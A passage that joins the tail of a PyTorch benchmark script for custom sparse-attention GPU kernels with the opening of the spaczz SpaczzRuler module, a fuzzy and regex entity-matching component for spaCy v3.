ctx.save_for_backward(row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x)
return y
@staticmethod
def backward(ctx, dy):
row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x = ctx.saved_tensors
dedata, dx = vector_spmm_backward(row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, dy, x)
return None, None, None, None, None, None, None, None, dedata, dx
class MaskedMMSimple(Function):
@staticmethod
def forward(ctx, inc_x, inc_y, A, B):
with th.no_grad():
A_e = th.sparse.mm(inc_x.float(), A) # shape: (e, d)
B_e = th.sparse.mm(inc_y.float(), B) # shape: (e, d)
ctx.save_for_backward(A_e, B_e, inc_x, inc_y)
y = (A_e * B_e).sum(-1) # shape: (e)
assert y.requires_grad==False
return y
@staticmethod
def backward(ctx, grad): # shape: (e)
A_e, B_e, inc_x, inc_y = ctx.saved_tensors
dAe = grad.unsqueeze(-1) * B_e
dBe = grad.unsqueeze(-1) * A_e
dA = th.sparse.mm(inc_x.t().float(), dAe)
dB = th.sparse.mm(inc_y.t().float(), dBe)
return None, None, dA, dB
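# Descriptive note (added): MaskedMMSimple is the dense reference the kernels
# are compared against. inc_x / inc_y are (num_edges x num_nodes) incidence
# matrices that gather, for every edge, the features of its source and
# destination node; the masked product is then a per-edge dot product
# y_e = <A[src(e)], B[dst(e)]>, and the backward pass scatters gradients back
# through the transposed incidence matrices.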
if __name__ == '__main__':
import os
batch_size = 512
l = 30
n = batch_size * l
e = batch_size * (l ** 2)
v = th.ones(e, dtype=th.uint8)
if not os.path.exists('i.pt'):
i = th.zeros(2, e, dtype=th.long)
eid_r = th.zeros(e, dtype=th.long)
eid_c = th.zeros(e, dtype=th.long)
indptr_r = th.zeros(n + 1, dtype=th.long)
indptr_c = th.zeros(n + 1, dtype=th.long)
indices_r = th.zeros(e, dtype=th.long)
indices_c = th.zeros(e, dtype=th.long)
cnt = 0
for b in range(batch_size):
for x in range(b * l, (b + 1) * l):
indptr_r[x] = cnt
for y in range(b * l, (b + 1) * l):
i[0, cnt] = x
i[1, cnt] = y
indices_r[cnt] = y
eid_r[cnt] = cnt
cnt += 1
indptr_r[n] = cnt
cnt = 0
for b in range(batch_size):
for y in range(b * l, (b + 1) * l):
indptr_c[y] = cnt
for x in range(b * l, (b + 1) * l):
indices_c[cnt] = x
eid_c[cnt] = b * l * l + (x % l) * l + (y % l)
cnt += 1
indptr_c[n] = cnt
th.save((i, eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c), 'i.pt')
else:
i, eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c = th.load('i.pt')
adj = th.sparse.ByteTensor(i, v, th.Size([n, n]))
adj_1 = th.sparse.FloatTensor(i, th.rand(e), th.Size([n, n])).cuda(0).coalesce()
adj_1.requires_grad_(True)
if not os.path.exists('ix.pt'):
i_x = th.zeros(2, e, dtype=th.long)
i_y = th.zeros(2, e, dtype=th.long)
cnt = 0
for b in range(batch_size):
for x in range(b * l, (b + 1) * l):
for y in range(b * l, (b + 1) * l):
i_x[0, cnt] = cnt
i_x[1, cnt] = x
i_y[0, cnt] = cnt
i_y[1, cnt] = y
cnt += 1
th.save((i_x, i_y), 'ixy.pt')
else:
i_x, i_y = th.load('ixy.pt')
inc_x = th.sparse.ByteTensor(i_x, v, th.Size([e, n]))
inc_y = th.sparse.ByteTensor(i_y, v, th.Size([e, n]))
import time
inc_x = inc_x.cuda(0)
inc_y = inc_y.cuda(0)
adj = adj.cuda(0)
eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c = eid_r.cuda(0), eid_c.cuda(0), indptr_r.cuda(0), indptr_c.cuda(0), indices_r.cuda(0), indices_c.cuda(0)
th.cuda.synchronize()
print('Single Head (batch size: 512, length: 30, dim: 1024)\n===========================================')
print('MaskedNN(src_dot_dst)\nsimple implementation(copy to edge)')
dim = 1024
A = th.rand(n, dim, requires_grad=True, device='cuda:0')
B = th.rand(n, dim, requires_grad=True, device='cuda:0')
grad = th.rand(e, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
B_e = th.sparse.mm(inc_y.float(), B)
y = (A_e * B_e).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('simple implementation, hand-crafted autograd')
tic = time.time()
y = MaskedMMSimple.apply(inc_x, inc_y, A, B)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('vanilla bmm')
tic = time.time()
y = (A.view(batch_size, l, dim) @ B.view(batch_size, l, dim).transpose(-1, -2)).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('custom kernel(csr)')
ROW, INDPTR_R = partition_csr(indptr_r, chunk_size=chunk_size)
COL, INDPTR_C = partition_csr(indptr_c, chunk_size=chunk_size)
tic = time.time()
y = MaskedMMCSR.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, A, B)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
# ------------------------------------------------------------------------
# Test sparse softmax
# ------------------------------------------------------------------------
print('------------------------------------')
print('vanilla softmax(scatter)')
tic = time.time()
x = th.rand(e, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l), -1).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(scatter)')
tic = time.time()
y = SparseSoftmax.apply(ROW, INDPTR_R, eid_r, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('vanilla softmax(gather)')
tic = time.time()
x = th.rand(e, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l), -2).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(gather)')
tic = time.time()
y = SparseSoftmax.apply(COL, INDPTR_C, eid_c, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('------------------------------------')
print("spmm(pytorch coalesce)")
A.grad.zero_()
grad = th.rand(n, dim, device='cuda:0')
tic = time.time()
y = th.sparse.mm(adj_1, A)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
y_ori = y.clone()
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori = A.grad.clone()
adj_grad_ori = adj_1.grad._values()
A.grad.zero_()
adj_1.grad.zero_()
print("vector-spmm(custom)")
tic = time.time()
val = adj_1._values()
val.requires_grad_(True)
y = VectorSPMM.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, val, A)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A_grad_ori, A.grad) and th.allclose(val.grad, adj_grad_ori)
A.grad.zero_()
val.grad.zero_()
"""
Multi Head Test
"""
print('\nMulti Head (batch size: 512, length: 30, head: 8, dim:64)\n===========================================')
print('NodeMulEdge\nsimple implementation(copy to edge)')
dim = 64
h = 8
A = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
B = th.rand(e, dim, requires_grad=True, device='cuda:0')
grad = th.rand(e, h, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
y = (A_e.view(-1, h, dim) * B.view(-1, 1, dim)).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('custom kernel')
tic = time.time()
y = NodeMulEdge.apply(ROW, INDPTR_R, eid_r, A.view(-1, h, dim), B.view(-1, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A_grad_ori, A.grad) and th.allclose(B_grad_ori, B.grad)
A.grad.zero_()
B.grad.zero_()
print('MaskedNN(src_dot_dst)\nsimple implementation(copy to edge)')
dim = 64
h = 8
A = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
B = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
grad = th.rand(e, h, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
B_e = th.sparse.mm(inc_y.float(), B)
y = (A_e.view(-1, h, dim) * B_e.view(-1, h, dim)).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('vanilla bmm')
tic = time.time()
y = (A.view(batch_size, l, h, dim).contiguous().transpose(1, 2) @ B.view(batch_size, l, h, dim).contiguous().permute(0, 2, 3, 1)).permute(0, 2, 3, 1).contiguous().view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('custom kernel(csr)')
tic = time.time()
y = MaskedMMCSR.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, A.view(-1, h, dim), B.view(-1, h, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
# ------------------------------------------------------------------------
# Test sparse softmax
# ------------------------------------------------------------------------
print('------------------------------------')
print('vanilla softmax(scatter)')
tic = time.time()
x = th.rand(e, h, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l, h), -2).view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(scatter)')
tic = time.time()
y = SparseSoftmax.apply(ROW, INDPTR_R, eid_r, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('vanilla softmax(gather)')
tic = time.time()
x = th.rand(e, h, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l, h), -3).view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(gather)')
tic = time.time()
y = SparseSoftmax.apply(COL, INDPTR_C, eid_c, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
adjs = []
for index in range(8):
adj_index = th.sparse.FloatTensor(i, th.rand(e), th.Size([n, n])).cuda(0).coalesce()
adj_index.requires_grad_(True)
adjs.append(adj_index)
print('------------------------------------')
print("spmm(pytorch coalesce)")
A.grad.zero_()
grad = [th.rand(n, dim, device='cuda:0') for _ in range(8)]
tic = time.time()
ys = []
for index in range(8):
ys.append(th.sparse.mm(adjs[index], A.view(n, h, dim)[:, index, :]))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
y_ori = th.cat([y.clone().view(n, 1, dim) for y in ys], dim=-2)
tic = time.time()
for index in range(8):
ys[index].backward(grad[index])
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori = A.grad.clone()
adj_grad_ori = th.cat([_.grad._values().view(e, 1) for _ in adjs], dim=-1)
A.grad.zero_()
for index in range(8):
adjs[index].grad.zero_()
print("vector-spmm(custom)")
val = th.cat([_._values().view(-1, 1) for _ in adjs], dim=-1)
val.requires_grad_(True)
tic = time.time()
y = VectorSPMM.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, val, A.view(n, h, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(th.cat([_.view(n, 1, dim) for _ in grad], dim=-2))
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
|
src/spaczz/pipeline/_spaczzruler.py | JonasHablitzel/spaczz | 153 | 12652918 | """Module for spaCy v3 compatible SpaczzRuler."""
from __future__ import annotations
from collections import defaultdict
from itertools import chain
from pathlib import Path
from typing import (
Any,
Callable,
DefaultDict,
Dict,
Iterable,
List,
Optional,
Set,
Tuple,
Union,
)
import warnings
try:
from spacy.language import Language
from spacy.pipeline import Pipe
from spacy.scorer import get_ner_prf
from spacy.tokens import Doc, Span
from spacy.training import Example, validate_examples
from spacy.util import SimpleFrozenDict, SimpleFrozenList
except ImportError: # pragma: no cover
raise ImportError(
(
"Trying to import spaCy v3 compatible SpaczzRuler from spaCy v2.",
"Please upgrade or use the SpaczzRuler in _spaczzruler-legacy",
)
)
import srsly
from ..exceptions import PatternTypeWarning
from ..matcher import FuzzyMatcher, RegexMatcher, TokenMatcher
from ..regex import RegexConfig
from ..util import ensure_path, nest_defaultdict, read_from_disk, write_to_disk
DEFAULT_ENT_ID_SEP = "||"
simple_frozen_dict = SimpleFrozenDict()
simple_frozen_list = SimpleFrozenList()
@Language.factory(
"spaczz_ruler",
assigns=["doc.ents", "token.ent_type", "token.ent_iob"],
default_config={
"overwrite_ents": False,
"ent_id_sep": DEFAULT_ENT_ID_SEP,
"fuzzy_defaults": simple_frozen_dict,
"regex_defaults": simple_frozen_dict,
"token_defaults": simple_frozen_dict,
},
default_score_weights={
"ents_f": 1.0,
"ents_p": 0.0,
"ents_r": 0.0,
"ents_per_type": None,
},
)
def make_spaczz_ruler(
# typing nlp with Language causes issue with Pydantic in spaCy integration
nlp: Any,
name: str,
overwrite_ents: bool,
ent_id_sep: str,
fuzzy_defaults: Dict[str, Any],
regex_defaults: Dict[str, Any],
token_defaults: Dict[str, Any],
) -> SpaczzRuler:
"""Factory method for creating a `SpaczzRuler`."""
return SpaczzRuler(
nlp,
name,
overwrite_ents=overwrite_ents,
ent_id_sep=ent_id_sep,
fuzzy_defaults=fuzzy_defaults,
regex_defaults=regex_defaults,
token_defaults=token_defaults,
)
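# --- Illustrative sketch (not part of the original module) ---
# With the factory registered above, the ruler is normally added through
# spaCy's `nlp.add_pipe` machinery; the config keys mirror `default_config`,
# and the pattern values are taken from the docstrings below as placeholders.
def _example_add_spaczz_ruler(nlp):  # pragma: no cover
    ruler = nlp.add_pipe("spaczz_ruler", config={"overwrite_ents": True})
    ruler.add_patterns([
        {"label": "ORG", "pattern": "Apple", "type": "fuzzy",
         "kwargs": {"min_r2": 90}},
        {"label": "ORG", "pattern": [{"TEXT": {"FUZZY": "Apple"}}],
         "type": "token"},
    ])
    return ruler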
class SpaczzRuler(Pipe):
"""The `SpaczzRuler` adds fuzzy and multi-token regex matches to spaCy `Doc.ents`.
It can be combined with other spaCy NER components like the statistical
`EntityRecognizer` and/or the `EntityRuler` to boost accuracy.
After initialization, the component is typically added to the pipeline
using `nlp.add_pipe`.
Attributes:
nlp: The shared nlp object to pass the vocab to the matchers
(not currently used by spaczz matchers) and process fuzzy patterns.
fuzzy_patterns:
Patterns added to the fuzzy matcher.
regex_patterns:
Patterns added to the regex matcher.
token_patterns:
            Patterns added to the token matcher.
fuzzy_matcher: The `FuzzyMatcher` instance
the spaczz ruler will use for fuzzy phrase matching.
regex_matcher: The `RegexMatcher` instance
the spaczz ruler will use for regex phrase matching.
token_matcher: The `TokenMatcher` instance
the spaczz ruler will use for token matching.
defaults: Default matching settings for their respective matchers.
"""
name = "spaczz_ruler"
def __init__(
self: SpaczzRuler,
nlp: Language,
name: str = "spaczz_ruler",
*,
overwrite_ents: bool = False,
ent_id_sep: str = DEFAULT_ENT_ID_SEP,
fuzzy_defaults: Dict[str, Any] = simple_frozen_dict,
regex_defaults: Dict[str, Any] = simple_frozen_dict,
token_defaults: Dict[str, Any] = simple_frozen_dict,
regex_config: Union[str, RegexConfig] = "default",
patterns: Optional[Iterable[Dict[str, Any]]] = None,
**kwargs: Any,
) -> None:
"""Initialize the spaczz ruler.
If `patterns` is supplied here, it needs to be an iterable of spaczz patterns:
dictionaries with `"label"`, `"pattern"`, and `"type"` keys.
If the patterns are fuzzy or regex phrase patterns
they can include the optional `"kwargs"` keys.
For example, a fuzzy phrase pattern:
`{'label': 'ORG', 'pattern': 'Apple',
'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`
Or, a token pattern:
`{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`
Prior to spaczz v0.5, optional parameters had to be prepended with "spaczz_"
to prevent potential conflicts with other spaCy components.
As of spaCy v3 this is no longer an issue so prepending optional parameters
with "spaczz_" is no longer necessary.
Args:
nlp: The shared `Language` object to pass the vocab to the matchers
and process fuzzy patterns.
name: Instance name of the current pipeline component. Typically
passed in automatically from the factory when the component is
added. Used to disable the current entity ruler while creating
phrase patterns with the nlp object.
overwrite_ents: If existing entities are present, e.g. entities
added by the model, overwrite them by matches if necessary.
Default is `False`.
ent_id_sep: Separator used internally for entity IDs.
fuzzy_defaults: Modified default parameters to use with the `FuzzyMatcher`.
Default is `None`.
regex_defaults: Modified default parameters to use with the `RegexMatcher`.
Default is `None`.
token_defaults: Modified default parameters to use with the `TokenMatcher`.
Default is `None`.
regex_config: Should largely be ignored as an artifact of an old spaczz
design pattern. Will likely be updated in the future.
Default is `"default"`.
patterns: Optional patterns to load in. Default is `None`.
kwargs: For backwards compatibility with "spaczz_" prepended parameters.
Raises:
TypeError: If matcher defaults passed are not dictionaries.
"""
self.nlp = nlp
self.name = name
self.overwrite = kwargs.get("spaczz_overwrite_ents", overwrite_ents)
self.fuzzy_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(
list, 2
)
self.regex_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(
list, 2
)
self.token_patterns: DefaultDict[str, List[List[Dict[str, Any]]]] = defaultdict(
list
)
self.ent_id_sep = kwargs.get("spaczz_ent_id_sep", ent_id_sep)
self._ent_ids: DefaultDict[Any, Any] = defaultdict(dict)
self.defaults = {}
default_names = (
"fuzzy_defaults",
"regex_defaults",
"token_defaults",
)
fuzzy_defaults = kwargs.get("spaczz_fuzzy_defaults", fuzzy_defaults)
regex_defaults = kwargs.get("spaczz_regex_defaults", regex_defaults)
token_defaults = kwargs.get("spaczz_token_defaults", token_defaults)
for default, name in zip(
(fuzzy_defaults, regex_defaults, token_defaults), default_names
):
if isinstance(default, dict):
self.defaults[name] = default
else:
raise TypeError(
(
"Defaults must be a dictionary of keyword arguments,",
f"not {type(default)}.",
)
)
self.fuzzy_matcher = FuzzyMatcher(nlp.vocab, **self.defaults["fuzzy_defaults"])
self.regex_matcher = RegexMatcher(
nlp.vocab, regex_config, **self.defaults["regex_defaults"]
)
self.token_matcher = TokenMatcher(nlp.vocab, **self.defaults["token_defaults"])
patterns = kwargs.get("spaczz_patterns", patterns)
if patterns is not None:
self.add_patterns(patterns)
def __call__(self: SpaczzRuler, doc: Doc) -> Doc:
"""Find matches in document and add them as entities.
Args:
doc: The Doc object in the pipeline.
Returns:
The Doc with added entities, if available.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> doc = nlp.make_doc("My name is <NAME>")
>>> ruler.add_patterns([{"label": "NAME", "pattern": "<NAME>",
"type": "fuzzy", "kwargs": {"fuzzy_func": "token_sort"}}])
>>> doc = ruler(doc)
>>> "<NAME>" in [ent.text for ent in doc.ents]
True
"""
error_handler = self.get_error_handler()
try:
matches, lookup = self.match(doc)
self.set_annotations(doc, matches, lookup)
return doc
        except Exception as e:
error_handler(self.name, self, [doc], e)
def __contains__(self: SpaczzRuler, label: str) -> bool:
"""Whether a label is present in the patterns."""
return (
label in self.fuzzy_patterns
or label in self.regex_patterns
or label in self.token_patterns
)
def __len__(self: SpaczzRuler) -> int:
"""The number of all patterns added to the ruler."""
n_fuzzy_patterns = sum(len(p["patterns"]) for p in self.fuzzy_patterns.values())
n_regex_patterns = sum(len(p["patterns"]) for p in self.regex_patterns.values())
n_token_patterns = sum(len(p) for p in self.token_patterns.values())
return n_fuzzy_patterns + n_regex_patterns + n_token_patterns
@property
def ent_ids(self: SpaczzRuler) -> Tuple[Optional[str], ...]:
"""All entity ids present in the match patterns id properties.
Returns:
The unique string entity ids as a tuple.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy", "id": "BEAT"}])
>>> ruler.ent_ids
('BEAT',)
"""
keys = set(self.fuzzy_patterns.keys())
keys.update(self.regex_patterns.keys())
keys.update(self.token_patterns.keys())
all_ent_ids = set()
for k in keys:
if self.ent_id_sep in k:
_, ent_id = self._split_label(k)
all_ent_ids.add(ent_id)
all_ent_ids_tuple = tuple(all_ent_ids)
return all_ent_ids_tuple
@property
def labels(self: SpaczzRuler) -> Tuple[str, ...]:
"""All labels present in the ruler.
Returns:
The unique string labels as a tuple.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler.labels
('AUTHOR',)
"""
keys = set(self.fuzzy_patterns.keys())
keys.update(self.regex_patterns.keys())
keys.update(self.token_patterns.keys())
all_labels = set()
for k in keys:
if self.ent_id_sep in k:
label, _ = self._split_label(k)
all_labels.add(label)
else:
all_labels.add(k)
return tuple(all_labels)
@property
def patterns(self: SpaczzRuler) -> List[Dict[str, Any]]:
"""Get all patterns and kwargs that were added to the ruler.
Returns:
The original patterns and kwargs, one dictionary for each combination.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "STREET", "pattern": "street_addresses",
"type": "regex", "kwargs": {"predef": True}}])
>>> ruler.patterns == [
{
"label": "STREET",
"pattern": "street_addresses",
"type": "regex",
"kwargs": {"predef": True},
},
]
True
"""
all_patterns = []
for label, fuzzy_patterns in self.fuzzy_patterns.items():
for fuzzy_pattern, fuzzy_kwargs in zip(
fuzzy_patterns["patterns"], fuzzy_patterns["kwargs"]
):
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": fuzzy_pattern.text, "type": "fuzzy"}
if fuzzy_kwargs:
p["kwargs"] = fuzzy_kwargs
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
for label, regex_patterns in self.regex_patterns.items():
for regex_pattern, regex_kwargs in zip(
regex_patterns["patterns"], regex_patterns["kwargs"]
):
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": regex_pattern, "type": "regex"}
if regex_kwargs:
p["kwargs"] = regex_kwargs
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
for label, token_patterns in self.token_patterns.items():
for token_pattern in token_patterns:
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": token_pattern, "type": "token"}
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
return all_patterns
def add_patterns(
self: SpaczzRuler,
patterns: Iterable[Dict[str, Any]],
) -> None:
"""Add patterns to the ruler.
A pattern must be a spaczz pattern:
`{label (str), pattern (str or list), type (str),
optional kwargs (dict[str, Any]), and optional id (str)}`.
For example, a fuzzy phrase pattern:
`{'label': 'ORG', 'pattern': 'Apple',
'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`
Or, a token pattern:
`{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`
To utilize regex flags, use inline flags.
Kwarg details to be updated.
Args:
patterns: The spaczz patterns to add.
Raises:
TypeError: If patterns is not an iterable of dictionaries.
ValueError: If one or more patterns do not conform
the spaczz pattern structure.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> "AUTHOR" in ruler.labels
True
"""
# disable the nlp components after this one in case
# they hadn't been initialized / deserialised yet
try:
current_index = -1
for i, (_name, pipe) in enumerate(self.nlp.pipeline):
if self == pipe:
current_index = i
break
subsequent_pipes = [
pipe for pipe in self.nlp.pipe_names[current_index + 1 :]
]
except ValueError:
subsequent_pipes = []
with self.nlp.select_pipes(disable=subsequent_pipes):
token_patterns = []
fuzzy_pattern_labels = []
fuzzy_pattern_texts = []
fuzzy_pattern_kwargs = []
fuzzy_pattern_ids = []
regex_pattern_labels = []
regex_pattern_texts = []
regex_pattern_kwargs = []
regex_pattern_ids = []
for entry in patterns:
try:
if isinstance(entry, dict):
if entry["type"] == "fuzzy":
fuzzy_pattern_labels.append(entry["label"])
fuzzy_pattern_texts.append(entry["pattern"])
fuzzy_pattern_kwargs.append(entry.get("kwargs", {}))
fuzzy_pattern_ids.append(entry.get("id"))
elif entry["type"] == "regex":
regex_pattern_labels.append(entry["label"])
regex_pattern_texts.append(entry["pattern"])
regex_pattern_kwargs.append(entry.get("kwargs", {}))
regex_pattern_ids.append(entry.get("id"))
elif entry["type"] == "token":
token_patterns.append(entry)
else:
warnings.warn(
f"""Spaczz pattern "type" must be "fuzzy", "regex",
or "token", not {entry["type"]}. Skipping this pattern.
""",
PatternTypeWarning,
)
else:
raise TypeError(
("Patterns must either be an iterable of dicts.")
)
except KeyError:
raise ValueError(
(
"One or more patterns do not conform",
"to spaczz pattern structure: ",
"{label (str), pattern (str or list), type (str),",
"optional kwargs (dict[str, Any]),",
"and optional id (str)}.",
)
)
fuzzy_patterns = []
for label, pattern, kwargs, ent_id in zip(
fuzzy_pattern_labels,
self.nlp.pipe(fuzzy_pattern_texts),
fuzzy_pattern_kwargs,
fuzzy_pattern_ids,
):
fuzzy_pattern = {
"label": label,
"pattern": pattern,
"kwargs": kwargs,
"type": "fuzzy",
}
if ent_id:
fuzzy_pattern["id"] = ent_id
fuzzy_patterns.append(fuzzy_pattern)
regex_patterns = []
for label, pattern, kwargs, ent_id in zip(
regex_pattern_labels,
regex_pattern_texts,
regex_pattern_kwargs,
regex_pattern_ids,
):
regex_pattern = {
"label": label,
"pattern": pattern,
"kwargs": kwargs,
"type": "regex",
}
if ent_id:
regex_pattern["id"] = ent_id
regex_patterns.append(regex_pattern)
self._add_patterns(fuzzy_patterns, regex_patterns, token_patterns)
def clear(self: SpaczzRuler) -> None:
"""Reset all patterns."""
self.fuzzy_patterns = nest_defaultdict(list, 2)
self.regex_patterns = nest_defaultdict(list, 2)
